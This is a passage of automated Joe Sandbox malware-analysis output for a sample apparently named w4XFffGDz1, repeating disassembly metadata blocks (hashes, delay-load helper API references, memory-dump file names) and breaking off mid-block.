                        • Opcode Fuzzy Hash: 751acaf4e5a04d47de822f092e7cf9acefafa11dfb75e930b3da4455a407d8a2
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: ee2a6ce2c68235e84a27a05f307a0f53a81678eb52f67d69e290c1745453961a
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
                        • Opcode Fuzzy Hash: ee2a6ce2c68235e84a27a05f307a0f53a81678eb52f67d69e290c1745453961a
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 29b9b5af212ee56f0861f0fdde6fc5dbfdb0189f598910b0477565dd1c6adc16
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
                        • Opcode Fuzzy Hash: 29b9b5af212ee56f0861f0fdde6fc5dbfdb0189f598910b0477565dd1c6adc16
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 437868731403efeadc6703a3238980ff19aa414d0bb76ba2c9d0c6fc557da918
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
                        • Opcode Fuzzy Hash: 437868731403efeadc6703a3238980ff19aa414d0bb76ba2c9d0c6fc557da918
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 9597e450bb270be3fde922d8629f25d6df7f6758fe0b791f3a35d0bb5277907b
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
                        • Opcode Fuzzy Hash: 9597e450bb270be3fde922d8629f25d6df7f6758fe0b791f3a35d0bb5277907b
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: e40295607c732942714d065e1fa978be3901efca43818cad95dab046aa581c26
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
                        • Opcode Fuzzy Hash: e40295607c732942714d065e1fa978be3901efca43818cad95dab046aa581c26
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B796
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 24c639a33d0e450b0be7ace32748cfa07bb48d413d082a47c2a26fc75b81a581
                        • Instruction ID: fc79c657aaf4b27c6cf97219fe6d9f3a41c0907a2554a82828b42d747c51a9a9
                        • Opcode Fuzzy Hash: 24c639a33d0e450b0be7ace32748cfa07bb48d413d082a47c2a26fc75b81a581
                        • Instruction Fuzzy Hash: C2A022CA2AC203BCB00C32802C8BC3B220CC2C8F203308E0EF022C80C0AB800E800AB8
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 8172e98aae21330cf0e4087c0896b05d68b5a47a3d3cb8d0f24614f16fa8c56a
                        • Instruction ID: 9141cd8e7e26713bb849af0b396849286befd91fea5a7f294155f7a6ee4b58f9
                        • Opcode Fuzzy Hash: 8172e98aae21330cf0e4087c0896b05d68b5a47a3d3cb8d0f24614f16fa8c56a
                        • Instruction Fuzzy Hash: 1EA012D566C1103C740831401C86C37010CC1C1B143B04119F50084040A74029400A30
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 74929dbb75887e5b8470af770b6bce616a96f26138f9b73ae46559148d10b90f
                        • Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
                        • Opcode Fuzzy Hash: 74929dbb75887e5b8470af770b6bce616a96f26138f9b73ae46559148d10b90f
                        • Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 780db0fcdcf147d78381fad5f356b62394889101350c9e6800280f478bb401aa
                        • Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
                        • Opcode Fuzzy Hash: 780db0fcdcf147d78381fad5f356b62394889101350c9e6800280f478bb401aa
                        • Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 5dbf04bffc3fec38f845119ab95e3c7caf224099722c1a3604d5bc6bad5bbaf4
                        • Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
                        • Opcode Fuzzy Hash: 5dbf04bffc3fec38f845119ab95e3c7caf224099722c1a3604d5bc6bad5bbaf4
                        • Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 0619cb05f9749757ecebd2fe036cda94df2f0d7b2a9ff6316c1c9521a3a5667f
                        • Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
                        • Opcode Fuzzy Hash: 0619cb05f9749757ecebd2fe036cda94df2f0d7b2a9ff6316c1c9521a3a5667f
                        • Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018B9B9
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: f5af8d2324467be4a1811de9172f7ebc1e4eb40122e8a29b67332775e000c063
                        • Instruction ID: d05d990f42f303a44f6728beef2b5b42ff6853b0118a6dc35ab5472e18193663
                        • Opcode Fuzzy Hash: f5af8d2324467be4a1811de9172f7ebc1e4eb40122e8a29b67332775e000c063
                        • Instruction Fuzzy Hash: E4A024C577C1117C700C31401C47C37010CC1C1F54370451DF101C404077403D400F30
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: ba224b9af7c854849b632a043b09eab229dbc25978e7b8b1af555cf2981cb626
                        • Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
                        • Opcode Fuzzy Hash: ba224b9af7c854849b632a043b09eab229dbc25978e7b8b1af555cf2981cb626
                        • Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 0100addc0184b07fd7ed232690ba4b7047038cdc79b189787f4882bc041d3dd2
                        • Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
                        • Opcode Fuzzy Hash: 0100addc0184b07fd7ed232690ba4b7047038cdc79b189787f4882bc041d3dd2
                        • Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 0d4962214e1fd5c5c50729344eacbdcdd43515b3b686bb4e982b5a7e1a8909cf
                        • Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
                        • Opcode Fuzzy Hash: 0d4962214e1fd5c5c50729344eacbdcdd43515b3b686bb4e982b5a7e1a8909cf
                        • Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAA3
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 595ed4b99dd33fcce1c6f6a12d1c17fc813b0acd6cb3f460e356feaa12eb7766
                        • Instruction ID: a2b6c98560b681944de99d19277aa61086628425b2ee09516a41439a74a9b4d5
                        • Opcode Fuzzy Hash: 595ed4b99dd33fcce1c6f6a12d1c17fc813b0acd6cb3f460e356feaa12eb7766
                        • Instruction Fuzzy Hash: 9BA012C926C0027C710C31501C42C36011CC1D5B103708509F011C4040974029002970
                        APIs
                        • SetDlgItemTextW.USER32(?,?,?), ref: 00171B30
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
